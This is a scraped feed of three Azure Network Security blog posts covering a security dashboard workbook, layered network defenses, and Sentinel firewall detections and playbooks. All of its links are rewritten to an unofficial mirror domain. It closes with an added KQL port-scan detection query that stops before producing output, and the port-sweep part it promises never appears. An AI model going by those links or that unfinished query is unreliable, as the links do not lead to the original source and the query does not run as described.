Azure Network Security articles https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/bg-p/AzureNetworkSecurityBlog Azure Network Security articles Thu, 28 Oct 2021 09:09:39 GMT AzureNetworkSecurityBlog 2021-10-28T09:09:39Z Introducing the Network Security Dashboard for Azure Security Center https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-network-security-dashboard-for-azure-security/ba-p/2779842 <H2>&nbsp;</H2> <P><SPAN>Written in collaboration with <LI-USER uid="7427"></LI-USER>&nbsp;</SPAN><SPAN>(Program Manager,&nbsp;</SPAN><SPAN>Azure Security Center Product Team)</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P>Microsoft Azure enables you to deploy a variety of infrastructure, web application and automation resources.&nbsp; These resources are generally a part of a larger infrastructure or an application service that your organization provides to its internal and external users.&nbsp; In addition to the networking endpoints of an overarching service that your users interact with, the different resources in an infrastructure or application service interact with each other through their own networking endpoints.&nbsp; These interactions depend on the underlying networking services provided by the Azure cloud to communicate with other tiers and with its users.&nbsp; This communication internally within Azure and to Azure from external networks is protected with resource specific ACLs and with the cloud native network security services such as DDoS Protection, Web Application Firewall (WAF), Network Security Groups (NSG) and Firewall in Azure.&nbsp; With all network security controls in place, and each one implemented in a different dashboard, it becomes challenging for customers to have a single view of their entire Azure Network Security state, and that is what this workbook aims to solve.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Current Challenge</H2> <P>&nbsp;</P> <P>As 
your footprint in the Azure Cloud grows, the number of services, and of the infrastructure, application and automation resources involved in these services, increases significantly. As a result, more endpoints are exposed internally and externally, with or without the required security controls.&nbsp;&nbsp;<STRONG>This represents the attack surface of your organization which can be exploited by an attacker</STRONG>.&nbsp; To appropriately secure your attack surface, you require better monitoring and governance of your resources, services, and their endpoints.&nbsp; The first step in this process is to inventory and gain visibility into the networking and security configuration of your endpoints across your environment, along with the network security services they utilize or those which may be inline.&nbsp; This helps you understand all the different paths an attacker can use to compromise your boundary and infiltrate your environment, plus the protections you already have against them or those that need to be put in place to prevent them.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Proposed Solution</H2> <P>&nbsp;</P> <P>Up until now, there was no single view with which you could visualize all your externally or internally exposed endpoints, their networking and security configuration or the network security services you had set up in Azure.&nbsp; You had to browse through many different blades in Azure to assess and obtain this information.&nbsp; With the availability of the new Network Security Dashboard for Security Center, you can now quickly get real-time visibility of the security configuration of your networking and network security services, across multiple subscriptions in Azure.<BR /><BR /></P> <P><STRONG>The Network Security Dashboard is free to use for all customers and does not require you to be a paid customer of Azure Security Center.</STRONG></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>What’s in the Dashboard</H2> 
<P>&nbsp;</P> <P>The new Network Security Dashboard for Security Center provides a unified view and deep visibility into the configuration of your overall networking and network security services in Azure. &nbsp;If you have been actively using Security Center and Network Security features in Azure, this dashboard is for you!<BR /><BR /></P> <P>The dashboard is powered by Azure Resource Graph (ARG) queries and divided into different sections as explained below:<BR /><BR /></P> <P>&nbsp;</P> <UL> <LI><STRONG>Overview:</STRONG>&nbsp;summary view of all your network security and networking resources for selected subscription(s)</LI> <LI><STRONG>Public IPs &amp; exposed ports:</STRONG>&nbsp;ports exposed to the internet and mapping of public IPs to asset types</LI> <LI><STRONG>Network security services:</STRONG>&nbsp;DDoS protection plans, Azure Firewall and Firewall policies, Azure WAF policies and NSG views</LI> <LI><STRONG>Internal networking mapping:</STRONG>&nbsp;network interfaces, route tables, private links, and virtual networks with DDoS protection status (including subnets and peering)</LI> <LI><STRONG>Gateway and VPN services:</STRONG>&nbsp;consolidated view of Bastion hosts, VPN gateways, Virtual Network Gateways and ExpressRoute circuits</LI> <LI><STRONG>Traffic Manager:</STRONG>&nbsp;details of all your traffic manager profiles</LI> <LI><STRONG>Security Center recommendations:</STRONG>&nbsp;filtered view of all ASC network related recommendations including resource count, severity, and security control<BR /><BR /></LI> </UL> <P><STRONG>Informational options </STRONG>can be accessed&nbsp;using the action bars in the top section: select the FAQ button to show the frequently asked questions. 
You can also see recent changes documented on the change log option.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How to Deploy</H2> <P>&nbsp;</P> <P>The Network Security Dashboard is available in the Azure Security Center GitHub Repo page, under Workbooks and can be accessed directly with its direct URL: <A href="#" target="_blank" rel="noopener">https://aka.ms/DeployNetSecWorkbook</A></P> <P>The workbook can be deployed quickly in the Azure Commercial and Gov cloud environments by clicking the respective “Deploy to Azure” buttons on the workbook page.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Deploy-NetworkSecurityDashboard-Edited-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312511i4125608793888E8B/image-size/large?v=v2&amp;px=999" role="button" title="Deploy-NetworkSecurityDashboard-Edited-Final.gif" alt="Deploying Network Security Dashboard" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Deploying Network Security Dashboard</span></span></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How Does it Work</H2> <P>&nbsp;</P> <P>The Network Security Dashboard is a workbook in Azure Security Center.&nbsp; The workbook is based on Azure Resource Graph (ARG) queries which retrieve real time configuration data of your resources, networking and network security services deployed across multiple subscriptions in Azure.&nbsp; The workbook can be edited, and all queries can be modified to meet your needs.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How to Use</H2> <P>&nbsp;</P> <P>To use this dashboard, you need at least Reader permission at the subscription level. 
Assuming you have the required permissions, watch the screen capture below to learn about how to navigate through and use the dashboard.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="HowToUse-NetworkSecurityDashboard-Edited-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312512iB70BA89B4D608DB0/image-size/large?v=v2&amp;px=999" role="button" title="HowToUse-NetworkSecurityDashboard-Edited-Final.gif" alt="Using Network Security Dashboard" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Using Network Security Dashboard</span></span></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Conclusion</H2> <P>&nbsp;</P> <P>The Network Security dashboard provides valuable information about your attack surface in Azure.&nbsp; The workbook is available to all customers free of charge and does not require you to be a paid customer of ASC.<BR /><BR /></P> <P>We will continue to add support for additional Azure Network Security and networking products to the workbook in future.&nbsp; You will find information about all future revisions and currently planned future updates in the <A href="#" target="_blank" rel="noopener">Upcoming Changes</A> section on the GitHub page for the workbook.&nbsp; You can also <A href="#" target="_blank" rel="noopener">contribute</A> to the workbook by joining the community and following the guidance.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Additional Resources</H2> <P>&nbsp;</P> <UL> <LI>To learn more about Azure Security Center, visit: <A href="#" target="_blank" rel="noopener">https://aka.ms/ascninja</A></LI> <LI>To learn more about Azure Network Security, visit:&nbsp;&nbsp;<A href="#" target="_blank" rel="noopener">https://aka.ms/AzNetSecNinja</A></LI> <LI>To deploy or learn more about the Network Security Dashboard, visit: <A href="#" target="_blank" 
rel="noopener">https://aka.ms/DeployNetSecWorkbook</A></LI> <LI>To learn about ASC workbooks, visit: &nbsp;<SPAN><A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/security-center/custom-dashboards-azure-workbooks</A></SPAN></LI> <LI>To learn about ARG, visit:&nbsp; <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/governance/resource-graph/</A> <H2><BR /><BR /><BR /></H2> </LI> </UL> <P class="lia-indent-padding-left-30px"><STRONG>Reviewers:<BR /><LI-USER uid="124214"></LI-USER><SPAN>,&nbsp;Principal PM (Azure Security Center CxE)</SPAN></STRONG></P> <P class="lia-indent-padding-left-30px"><STRONG><LI-USER uid="324143"></LI-USER>, Senior Product Marketing Manager (Azure Marketing)&nbsp;</STRONG></P> <H2 class="lia-indent-padding-left-30px">&nbsp;</H2> <H2 class="lia-indent-padding-left-30px"><STRONG>&nbsp;<BR /></STRONG></H2> Wed, 06 Oct 2021 17:15:42 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-network-security-dashboard-for-azure-security/ba-p/2779842 Mohit_Kumar 2021-10-06T17:15:42Z Improve your Azure Network Infrastructure Security with Complementary Services https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/improve-your-azure-network-infrastructure-security-with/ba-p/2697246 <P>Given the rising number of cyber-attacks and data breaches in recent times, security has become paramount. For a while now, it’s been clear that securing only your network’s perimeter is simply not enough. The idea that we can inherently trust systems or users in “internal networks” is a recipe for disaster.&nbsp; Not to mention, it’s likely that many of your systems and users are not even in an internal network anymore.</P> <P>&nbsp;</P> <P>In this ever-changing world, attackers are constantly finding new ways to exploit vulnerabilities. 
This is one of the reasons to consider the strategy of defense-in-depth: if there are multiple layers of protection in place and one of them fails, another security mechanism exists to stand in the way of an attack.</P> <P>&nbsp;</P> <P>Besides a multi-layered approach to security, having a <A href="#" target="_blank" rel="noopener">Zero Trust</A> mindset is important. We focus on three principles when pursuing Zero Trust practices: verify explicitly, use least privileged access, and assume breach.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ZTNetSecDiagram.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306588i1CAF3817E5E97678/image-size/large?v=v2&amp;px=999" role="button" title="ZTNetSecDiagram.jpg" alt="ZTNetSecDiagram.jpg" /></span></P> <P>&nbsp;</P> <P><STRONG>Do you want to segment your cloud resources and protect against malicious traffic flows?</STRONG></P> <P>&nbsp;</P> <P>Ensuring that the systems and resources are well segmented is foundational in network security. However, resources have legitimate reasons to communicate with one another. How can we detect and prevent threats across the resources that are segmented but need to communicate?</P> <P>&nbsp;</P> <P>With <A href="#" target="_blank" rel="noopener">Azure Firewall</A>, you can keep your virtual networks (VNETs) segmented in a <A href="#" target="_blank" rel="noopener">hub-and-spoke architecture</A> model. The Azure Firewall is responsible for enforcing rules centrally, allowing or denying traffic that flows to and from resources in VNETs. 
However, the resources may still need to communicate over the network.</P> <P>&nbsp;</P> <P>For connections that are allowed, Azure Firewall helps you <STRONG>explicitly verify</STRONG> the security of these connections with <A href="#" target="_blank" rel="noopener">Threat Intelligence</A>-based filtering and <A href="#" target="_blank" rel="noopener">Intrusion Detection and Prevention System (IDPS)</A>. Allowed connections should not be blindly trusted: by <STRONG>assuming breach</STRONG>, we can watch out for potential attacks occurring within our networks. Threat Intelligence actively looks for connections to malicious IPs or domains, taking action to block that traffic even if it was allowed in the first place. IDPS offers an <STRONG>extra layer of defense</STRONG>, allowing for rapid detection of attacks by looking for specific patterns, such as byte sequences in network traffic, or known malicious instruction sequences used by malware.</P> <P>&nbsp;</P> <P><STRONG>Do you want administrators to manage resources securely from any device and any location, while minimizing attack surface?</STRONG></P> <P>&nbsp;</P> <P>Most of our administrators are no longer in our data centers where they can physically manage systems. The mentality of allowing administrators access to manage resources solely based on their network location no longer matches our reality, nor should we expose our systems to the public internet so that administrators can manage them on the go.</P> <P>&nbsp;</P> <P>The most common needs for secure administration include strong authentication mechanisms, minimized direct exposure to the internet, and control over how and when administrators access resources. With <A href="#" target="_blank" rel="noopener">Azure Bastion</A>, you can keep virtual machines in Azure completely private and still allow administrators to manage them from any device and any location. 
In this scenario, virtual machines are managed via the Azure Portal with Azure Bastion. This method <STRONG>explicitly verifies</STRONG> credentials before each connection, and <A href="#" target="_blank" rel="noopener">multi-factor authentication</A>, <A href="#" target="_blank" rel="noopener">least privilege access controls</A> and <A href="#" target="_blank" rel="noopener">conditional access policies</A> can be configured and enforced to provide <STRONG>multi-layered protection</STRONG> against potential administrative exploitations.</P> <P>&nbsp;</P> <P><STRONG>Do you want to have resilient resources that are up and running, even when under attack?</STRONG></P> <P>&nbsp;</P> <P>We want to ensure that our services are resilient and available to our users as much as possible. Even if attackers are trying to disrupt the availability of our services, we need the ability to <STRONG>explicitly verify</STRONG> which connections are coming from legitimate users and which ones are malicious.</P> <P>&nbsp;</P> <P>With <A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard</A>, mitigation of distributed denial-of-service (DDoS) attacks is auto-tuned to the capacity of your resources. When an attack is detected, mitigation starts automatically. It identifies which packets are coming from attackers and drops those connections, while legitimate packets are forwarded to your services, minimizing the impact on valid users while an attack is occurring.</P> <P>&nbsp;</P> <P><STRONG>How do these services work together to improve overall network security?</STRONG></P> <P>&nbsp;</P> <P>As explored above, Azure Bastion and Azure Firewall are essential services for securely managing our resources and catching malicious traffic activity in our networks. Since Azure Bastion and Azure Firewall are services that can have public IP addresses, they may be susceptible to DDoS attacks. 
With Azure DDoS Protection Standard, we can stand against DDoS attacks that could potentially impact the availability of these crucial security services. Azure DDoS Protection acts as insurance to keep critical infrastructure running even in the event of an attack.</P> <P>&nbsp;</P> <P><STRONG>Next Steps</STRONG></P> <P>&nbsp;</P> <UL> <LI>Deploy our <A href="#" target="_blank" rel="noopener">Network Security Dashboard</A> workbook for <A href="#" target="_blank" rel="noopener">Azure Security Center</A> to gain visibility into your public IP assets and better gauge your level of exposure.</LI> <LI>Follow this <A href="#" target="_blank" rel="noopener">Azure Bastion QuickStart</A> tutorial to configure Azure Bastion&nbsp;and test how you can manage a virtual machine (VM) securely without needing direct public access to the VM.</LI> <LI>Deploy our <A href="#" target="_blank" rel="noopener">Azure Network Security Lab</A> from GitHub for hands-on testing of Azure Firewall and Azure DDoS Protection Standard.</LI> </UL> <P>&nbsp;</P> <P><STRONG>References</STRONG></P> <P>&nbsp;</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure Firewall</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure Bastion</A></LI> </UL> Tue, 31 Aug 2021 20:23:42 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/improve-your-azure-network-infrastructure-security-with/ba-p/2697246 camilamartins 2021-08-31T20:23:42Z New Detections, Hunting Queries and Response Automation in Azure Firewall Solution for Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746 <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Recent breaches</A> surface the need for all organizations to adopt an assume-breach mindset toward security.&nbsp; 
While organizations continue to invest heavily in the products and technology to prevent breaches, having automated threat detection and response capabilities to identify malicious actors and actions in your environment has become the need of the hour.&nbsp; To enable these capabilities at scale, organizations need to have cutting-edge monitoring and response tools along with the detection logic to identify threats.</P> <P>&nbsp;</P> <P>The cloud native Azure Firewall provides protection against network-based threats. &nbsp;Azure Sentinel is the cloud native SIEM and SOAR solution which provides threat detection, hunting, and automated response capabilities for Azure Firewall.&nbsp; While this is great, customers must go through multiple blades and steps in Azure Sentinel to deploy and configure all the detections, hunting queries, workbooks, and automation, which can be an overhead.</P> <P>&nbsp;</P> <P>Readers of this post will hopefully be aware of the ever-growing integration between Azure Firewall and Azure Sentinel<STRONG><SUP>1</SUP></STRONG>.&nbsp; At Microsoft, we continue to innovate best security detection and response experiences for you, and we are excited to present the <STRONG>Azure Firewall Solution for Azure Sentinel</STRONG>, as announced in the blog post <A href="#" target="_blank" rel="noopener">Optimize security with Azure Firewall solution for Azure Sentinel</A><STRONG><SUP>2</SUP></STRONG>.&nbsp; The Azure Firewall Solution<STRONG> provides Azure Firewall specific net new detections and hunting queries</STRONG>.&nbsp; The solution also contains a new firewall workbook and automation components, which can now be deployed in a single, streamlined method.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG><SUP>1</SUP></STRONG> <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958" target="_blank" rel="noopener">New Detections for Azure Firewall in Azure 
Sentinel</A></FONT></P> <P><FONT size="2"><STRONG><SUP>1</SUP></STRONG> <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener">Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbook</A></FONT></P> <P><FONT size="2"><STRONG><SUP>2 </SUP></STRONG>Azure Sentinel Solutions announced in the RSA 2021 conference <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/rsa-conference-2021-new-innovations-for-azure-sentinel/ba-p/2346834" target="_blank" rel="noopener">RSA Conference 2021: New innovations for Azure Sentinel</A> and in the blog post <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">Introducing Azure Sentinel Solutions!</A></FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Scenario</H2> <P>&nbsp;</P> <P>In case of an attack from an external adversary or malicious activity in a trusted network, the traffic representing the anomaly must inevitably flow through the network where it will be processed and logged by network devices such as Azure Firewall.&nbsp; While real time threat detection and prevention features such as IDPS etc. 
can enable you to take action on the traffic patterns in question ahead of time, there will be scenarios which require a fine-grained evaluation before making decisions to block traffic.&nbsp; This is where Azure Firewall detections and hunting queries in Azure Sentinel provide you with a method to detect threats and respond to them automatically.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>What’s New</H2> <P>&nbsp;</P> <P>The Azure Firewall Solution provides new threat detections, hunting queries, a new firewall workbook and response automation as packaged content.&nbsp; This enables you to find the appropriate solution easily and then deploy all the components in the solution in a single step from the Solutions blade in Azure Sentinel.</P> <P>&nbsp;</P> <P>Below are the details of the components included in the Firewall Solution:<BR /><BR /></P> <P>&nbsp;</P> <OL> <LI>New Analytic Rule based detections:<BR /><BR /> <TABLE border="1" width="99.67811158798285%"> <TBODY> <TR> <TD width="14.27038626609442%"> <P><STRONG>Detection rule</STRONG></P> </TD> <TD width="36.48068669527897%"> <P><STRONG>What does it do?</STRONG></P> </TD> <TD width="48.927038626609445%"> <P><STRONG>What does it indicate?</STRONG></P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Port scan</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies a source IP scanning open ports on or through the Azure Firewall.</P> </TD> <TD width="48.927038626609445%"> <P>Malicious scanning of ports by an attacker, trying to reveal open ports in the organization that can be compromised for initial access.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Port sweep</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies a source IP scanning an open port on different IPs through the Azure Firewall.</P> </TD> <TD width="48.927038626609445%"> <P>Malicious scanning of a port by an attacker trying to reveal IPs with specific vulnerable ports open in the 
organization.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Abnormal deny rate for source IP</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies an abnormal deny rate for a specific source IP to a destination IP based on machine learning done during a configured period.</P> </TD> <TD width="48.927038626609445%"> <P>Potential exfiltration, initial access, or C2, where an attacker tries to exploit the same vulnerability on machines in the organization but is being blocked by the Azure Firewall rules.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Abnormal Port to protocol</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies communication for a well-known protocol over a non-standard port based on machine learning done during an activity period.</P> </TD> <TD width="48.927038626609445%"> <P>Malicious communication (C2) or exfiltration by attackers who try to communicate over known ports (SSH, HTTP) but do not use the known protocol headers that match the port number.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Multiple sources affected by the same TI destination</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies multiple machines that are trying to reach out to the same destination blocked by threat intelligence (TI) in the Azure Firewall.</P> </TD> <TD width="48.927038626609445%"> <P>An attack on the organization by the same attack group trying to exfiltrate data from the organization.</P> </TD> </TR> </TBODY> </TABLE> <BR /><BR /></LI> <LI>New Hunting Queries:<BR /><BR /> <TABLE border="1" width="99.78540772532189%"> <TBODY> <TR> <TD width="14.914163090128755%"> <P><STRONG>Hunting query</STRONG></P> </TD> <TD width="36.05150214592275%"> <P><STRONG>What does it do?</STRONG></P> </TD> <TD width="48.81974248927038%"> <P><STRONG>What is it based on? 
What does it indicate?</STRONG></P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>First time a source IP connects to destination port</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Helps to identify a common indication of an attack (IOA) when a new host or IP tries to communicate with a destination using a specific port.</P> </TD> <TD width="48.81974248927038%"> <P>Based on learning the regular traffic during a specified period.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>First time source IP connects to a destination</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Helps to identify an IOA when malicious communication is done for the first time from machines that never accessed the destination before.</P> </TD> <TD width="48.81974248927038%"> <P>Based on learning the regular traffic during a specified period.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>Source IP abnormally connects to multiple destinations</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Identifies a source IP that abnormally connects to multiple destinations.</P> </TD> <TD width="48.81974248927038%"> <P>Indicates initial access attempts by attackers trying to jump between different machines in the organization, exploiting a lateral movement path or the same vulnerability on different machines to find vulnerable machines to access.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>Uncommon port for the organization</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Identifies abnormal ports used in the organization network.</P> </TD> <TD width="48.81974248927038%"> <P>An attacker can bypass monitored ports and send data through uncommon ports. 
This allows the attackers to evade detection by routine detection systems.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>Uncommon port connection to destination IP</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Identifies abnormal ports used by machines to connect to a destination IP.</P> </TD> <TD width="48.81974248927038%"> <P>An attacker can bypass monitored ports and send data through uncommon ports. This can also indicate an exfiltration attack from machines in the organization by using a port that has never been used on the machine for communication.</P> </TD> </TR> </TBODY> </TABLE> <BR /><BR /></LI> <LI>A single Sentinel Workbook which supports the Azure Firewall Standard and Premium SKUs<BR /><BR /><BR /></LI> <LI>Custom Logic App Connector and three new Playbook Templates for Azure Firewall<BR /><BR /> <TABLE border="1" width="99.78540772532187%"> <TBODY> <TR> <TD width="38.0901287553648%"> <P><STRONG>Connector and Playbooks</STRONG></P> </TD> <TD width="61.69527896995708%"> <P><STRONG>What does it do?</STRONG></P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>Azure Firewall Connector</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>The connector allows you to take many different actions against Azure Firewall, Firewall Policy, and IP Groups.&nbsp; A full list of actions supported by the connector is available <A href="#" target="_blank" rel="noopener">here</A>.</P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>This playbook allows you to block IP addresses in Azure Firewall by adding them to <STRONG>IP Groups </STRONG>based on an analyst's decision. &nbsp;It allows you to make changes to IP Groups, which are attached to firewall rules, instead of making changes directly to the Azure Firewall. 
&nbsp;The target IP Group could be associated with policy/rules used in one or more firewalls.</P> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>AzureFirewall-AddIPtoTIAllowList</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>This playbook allows the SOC to automatically respond to Azure Sentinel incidents that include a destination IP address, by adding the specific IP to the Threat Intelligence (TI) Allow list in Azure Firewall.</P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>AzureFirewall-BlockIP-addNewRule</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>This playbook allows you to block an IP address by adding a new network rule with the specific IP to an existing Deny Network Rule Collection in Azure Firewall.</P> </TD> </TR> </TBODY> </TABLE> </LI> </OL> <P><STRONG>Notes</STRONG>:</P> <OL class="lia-list-style-type-lower-roman"> <LI><EM>To learn more about the Azure Firewall Logic App Connector and Playbooks, please refer to this blog post: </EM><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener"><EM>Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks </EM></A></LI> <LI><EM>The detections, hunting queries and the firewall workbook included in the solution are based on KQL and you can modify them to meet your specific requirements.&nbsp; The Firewall Playbooks can also be customized by adding or removing workflows, based on your needs.</EM></LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>How to Deploy</H2> <P>&nbsp;</P> <P>You must have Azure Firewall Standard or Premium with Firewall Policy or Classic Rules, and Azure Sentinel deployed in your environment to use the solution.&nbsp; In order to use the response automation capabilities provided by the Azure Firewall Logic App Connector and Playbooks included in the 
solution, prior to deploying the solution, you must complete the prerequisites provided in the detailed step-by-step guide available here: <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener">Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks</A>.</P> <P><STRONG><BR />Note</STRONG>: <EM>You may skip configuration of the Azure Firewall Connector and Playbooks prerequisites if you are not planning to use the response automation features at the time of deploying the Firewall Solution.</EM></P> <P>&nbsp;</P> <P>The Azure Firewall solution can be deployed quickly from the Solutions (Preview) gallery in Azure Sentinel.&nbsp; There are no other prerequisites to deploy and start using the Analytic Rule based detections, Hunting Queries, and the Firewall Workbook included in the solution package.&nbsp; Please see the screen capture below for a step-by-step process to deploy the firewall solution.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="DeployAzureFirewallSolution-RAW2-Edited7-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306060iB1F418A373583E2B/image-size/large?v=v2&amp;px=999" role="button" title="DeployAzureFirewallSolution-RAW2-Edited7-Final.gif" alt="Deploying Azure Firewall Solution for Azure Sentinel" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Deploying Azure Firewall Solution for Azure Sentinel</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>How to Configure Solution Components in Azure</H2> <P>&nbsp;</P> <P>After you have successfully deployed the Azure Firewall solution, please use the instructions below to enable and configure the different components of the solution.&nbsp;</P> 
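<P>The Port scan and Port sweep detections listed under What’s New differ only in what is counted per source IP: distinct ports on one destination versus distinct destinations on one port. The KQL below is an added example that makes this concrete. It is not the rule logic shipped with the solution, and the sample rows, the <CODE>msg_s</CODE> message layout, the five-minute window and both thresholds are assumptions.</P>

```kusto
// Added example, not the solution's shipped analytic rules.
// FirewallLogs holds constructed sample rows: 10.1.0.4 tries six ports on one
// host, 10.1.0.9 tries port 3389 on six hosts, 10.1.0.20 is ordinary traffic.
// TimeWindow and both thresholds are assumed values; tune them to your baseline.
let TimeWindow = 5m;
let PortThreshold = 5;   // distinct destination ports on ONE destination IP
let HostThreshold = 5;   // distinct destination IPs on ONE destination port
let FirewallLogs = datatable(TimeGenerated: datetime, msg_s: string) [
    datetime(2021-08-30 10:00:01), "TCP request from 10.1.0.4:50001 to 10.2.0.10:21. Action: Deny",
    datetime(2021-08-30 10:00:02), "TCP request from 10.1.0.4:50002 to 10.2.0.10:22. Action: Deny",
    datetime(2021-08-30 10:00:03), "TCP request from 10.1.0.4:50003 to 10.2.0.10:23. Action: Deny",
    datetime(2021-08-30 10:00:04), "TCP request from 10.1.0.4:50004 to 10.2.0.10:80. Action: Allow",
    datetime(2021-08-30 10:00:05), "TCP request from 10.1.0.4:50005 to 10.2.0.10:443. Action: Allow",
    datetime(2021-08-30 10:00:06), "TCP request from 10.1.0.4:50006 to 10.2.0.10:3389. Action: Deny",
    datetime(2021-08-30 10:01:01), "TCP request from 10.1.0.9:41001 to 10.2.0.11:3389. Action: Deny",
    datetime(2021-08-30 10:01:02), "TCP request from 10.1.0.9:41002 to 10.2.0.12:3389. Action: Deny",
    datetime(2021-08-30 10:01:03), "TCP request from 10.1.0.9:41003 to 10.2.0.13:3389. Action: Deny",
    datetime(2021-08-30 10:01:04), "TCP request from 10.1.0.9:41004 to 10.2.0.14:3389. Action: Deny",
    datetime(2021-08-30 10:01:05), "TCP request from 10.1.0.9:41005 to 10.2.0.15:3389. Action: Deny",
    datetime(2021-08-30 10:01:06), "TCP request from 10.1.0.9:41006 to 10.2.0.16:3389. Action: Deny",
    datetime(2021-08-30 10:02:01), "TCP request from 10.1.0.20:52001 to 10.2.0.30:443. Action: Allow",
    datetime(2021-08-30 10:02:31), "TCP request from 10.1.0.20:52002 to 10.2.0.30:443. Action: Allow"
];
// Split each message into source, destination and action fields.
let Parsed = FirewallLogs
    | parse msg_s with Protocol " request from " SourceIP ":" SourcePort:int
        " to " DestinationIP ":" DestinationPort:int ". Action: " Action;
// Port scan: one source, one destination, many ports.
let PortScan = Parsed
    | summarize DistinctCount = dcount(DestinationPort),
                Denied = countif(Action == "Deny"),
                Examples = make_set(tostring(DestinationPort), 10)
        by SourceIP, Target = DestinationIP, bin(TimeGenerated, TimeWindow)
    | where DistinctCount >= PortThreshold
    | extend Finding = "Port scan";
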